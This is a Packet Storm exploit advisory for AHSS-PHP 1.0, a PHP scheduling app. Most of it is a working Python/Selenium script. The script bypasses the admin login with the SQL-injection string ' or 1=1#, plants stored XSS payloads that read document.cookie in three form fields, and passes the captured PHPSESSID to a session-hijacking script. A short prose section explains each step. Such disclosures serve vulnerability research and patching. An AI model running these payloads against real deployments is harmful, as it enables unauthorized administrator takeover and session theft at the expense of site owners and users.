AHSS-PHP 1.0 Cross Site Scripting / SQL Injection

2021-09-15T00:00:00
ID PACKETSTORM:164165
Type packetstorm
Reporter nu11secur1ty
Modified 2021-09-15T00:00:00

Description

                                        
                                            `### Exploit Title: AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID  
### Author: nu11secur1ty  
### Testing and Debugging: nu11secur1ty  
### Date: 09.15.2021  
### Vendor: https://www.sourcecodester.com/user/257130/activity  
### Link:  
https://www.sourcecodester.com/php/14902/simple-assembly-hall-scheduling-system-php-free-source-code.html  
### CVE: CVE-nu11-11  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-nu11-11-09152021  
  
from selenium import webdriver  
import time  
import os  
from colorama import init, Fore, Back, Style  
init(convert=True)  
import requests  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/scheduler/admin/login.php"  
  
#enter your login username  
username="nu11secur1ty' or 1=1#"  
  
#enter your login password  
password="nu11secur1ty' or 1=1#"  
  
#enter the element for username input field  
element_for_username="username"  
#enter the element for password input field  
element_for_password="password"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
browser.maximize_window()  
time.sleep(1)  
browser.execute_script("document.querySelector('[class=\"btn btn-primary  
btn-block\"]').click()")  
  
time.sleep(1)  
exploit_link="  
http://localhost/scheduler/admin/?page=assembly_hall/manage_assembly"  
browser.get((exploit_link))  
  
browser.execute_script("document.querySelector('[name=\"room_name\"]').value=\"<script>alert(document.cookie)</script>\"")  
browser.execute_script("document.querySelector('[name=\"location\"]').value=\"<script>alert(document.cookie)</script>\"")  
browser.execute_script("document.querySelector('[name=\"description\"]').value=\"<script>alert(document.cookie)</script>\"")  
time.sleep(1)  
browser.execute_script("document.querySelector('[class=\"btn btn-flat  
btn-primary\"]').click()")  
  
coockie=browser.execute_script("return document.cookie")  
coockie=coockie.split("=")[1]  
print(coockie)  
browser.close()  
  
time.sleep(3)  
os.system("python PWNPHPSESSID.py " + coockie)  
  
print(Fore.GREEN +"The payload for CVE-nu11-11 is deployed...\n")  
print(Style.RESET_ALL)  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
------------------------------------------------------------------  
  
### Description:  
The AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application  
/scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication  
+ XSS-Stored Hijacking PHPSESSID  
- m0re info:  
https://portswigger.net/support/using-sql-injection-to-bypass-authentication.  
  
The parameter (username) from the login form is not protected correctly and  
there is no security and escaping from malicious payloads.  
When the user will sending a malicious query or malicious payload to the  
MySQL server he can bypass the login credentials and take control of the  
administer account.  
2. XSS - Stored PHPSESSID Vulnerable  
- The vulnerable XSS app: is "manage_assembly", parameters: "room_name"  
"location" and "description"  
After the successful SQL injection, the malicious user can be storing an  
XSS payload whit who can take the  
active PHPSESSID session.  
3. remote PHPSESSID - Injection  
- After the successful XSS attack the malicious user can take control of  
the administrative account of the system from everywhere  
by using the PHPSESSID, and then he can make a lot of bad things!  
  
-------------------------------------------------------------------  
### CONCLUSION: This vendor must STOP creating all these broken projects  
and vulnerable software programs, probably he is not a developer!  
  
### BR  
- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration  
Testing Engineer  
  
-------------------------------------------------------------------  
`